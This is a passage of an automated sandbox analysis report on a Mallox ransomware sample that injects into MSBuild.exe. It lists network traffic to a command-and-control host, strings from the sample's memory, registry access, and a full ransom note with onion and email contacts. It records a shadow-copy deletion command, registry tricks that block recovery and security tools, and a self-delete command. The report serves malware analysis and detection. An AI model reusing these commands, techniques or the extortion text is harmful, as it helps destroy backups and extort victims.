        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00401245 wnsprintfA,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,10_2_00401245
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Local Settings\Temporary Internet Files\FILE RECOVERY.txtJump to behavior
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: whyers.io
        Source: unknownHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: MSBuild.exeString found in binary or memory: http://api.ipify.org
        Source: MSBuild.exe, 0000000A.00000002.3357750284.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgx32x64%s
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
        Source: data_30.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: data_30.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2578481591.0000000007121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
        Source: data_30.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: data_30.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
        Source: data_30.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: data_30.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.00000000059C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmp, data_30.10.drString found in binary or memory: http://ocsp.digicert.com0
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/q/11564914;
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/q/14436606/
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/q/2152978/23354
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: icudtl.dat0.10.drString found in binary or memory: http://www.unicode.org/copyright.html
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.00000000059C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.00000000059C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.00000000059C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: data_30.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.00000000059C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: MSBuild.exe, 0000000A.00000002.3373526128.00000000048F0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3369924756.0000000004814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/
        Source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.3357750284.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3369924756.0000000004814000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3357750284.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.php
        Source: MSBuild.exe, 0000000A.00000002.3357750284.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.php-
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpContent-Type:
        Source: MSBuild.exe, 0000000A.00000002.3369924756.0000000004814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpD
        Source: MSBuild.exe, 0000000A.00000002.3369924756.0000000004814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/QWEwqdsvsf/ap.phpV
        Source: MSBuild.exe, 0000000A.00000002.3369924756.0000000004814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whyers.io/f
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, FILE RECOVERY.txt.10.dr, FILE RECOVERY.txt494.10.dr, FILE RECOVERY.txt438.10.dr, FILE RECOVERY.txt370.10.dr, FILE RECOVERY.txt386.10.dr, FILE RECOVERY.txt112.10.dr, FILE RECOVERY.txt128.10.dr, FILE RECOVERY.txt102.10.dr, FILE RECOVERY.txt216.10.dr, FILE RECOVERY.txt502.10.dr, FILE RECOVERY.txt630.10.dr, FILE RECOVERY.txt586.10.dr, FILE RECOVERY.txt243.10.dr, FILE RECOVERY.txt496.10.dr, FILE RECOVERY.txt565.10.dr, FILE RECOVERY.txt581.10.drString found in binary or memory: https://www.torproject.org/download/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownHTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:49844 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\FILE RECOVERY.txtDropped file: HelloYour files are encrypted and can not be usedTo return your files in work condition you need decryption toolFollow the instructions to decrypt all your dataDo not try to change or restore files yourself, this will break themIf you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MBHow to get decryption tool:1) Download and install TOR browser by this link: https://www.torproject.org/download/2) If TOR blocked in your country and you can't access to the link then use any VPN software3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin4) Copy your private ID in the input field. Your Private key: 8B411CAEA9D4C7A85768B1A05) You will see payment information and we can make free test decryption hereOur blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionIf you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.orgWaiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. Jump to dropped file
        Source: Yara matchFile source: Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6028, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6028, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-pathC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-pathC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000004F6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-pathC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: MSBuild.exe, 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: 0.%d%duser=%s&TargetID=%s&SystemInformation=%s&max_size_of_file=%s&size_of_hdd=%dPOST%s|%s|%s|%d/c ping 127.0.0.1 && del "%s" >> NULSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe-lr-d-p-pathC:\*C:\HOW TO RECOVER !!.TXT\sysnative\vssadmin.exe delete shadows /all /quietopenPowrProf.dllPowerSetActiveSchemeSeTakeOwnershipPrivilegeSeDebugPrivilegeNtQueryObjectntdll.dlluser32.dllShutdownBlockReasonCreatewindowDo NOT shutdown OR reboot your PC: this might damage your files permanently !valueSOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDownSOFTWARE\Microsoft\PolicyManager\default\Start\HideRestartSOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOutshutdownwithoutlogonSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemMaxConnectionTimeSOFTWARE\Policies\Microsoft\Windows NT\Terminal ServicesMaxDisconnectionTimeMaxIdleTimevector<T> too longstring too longmap/set<T> too longNtQuerySystemInformation\
        Source: vssadmin.exe, 0000000C.00000002.2441659537.000002435A900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\sysnative\vssadmin.exedeleteshadows/all/quietpq=0AZQBxXzbn@
        Source: vssadmin.exe, 0000000C.00000002.2441182494.000002435A620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietC:\Windows\sysnative\vssadmin.exeWinsta0\Default
        Source: vssadmin.exe, 0000000C.00000002.2441182494.000002435A620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
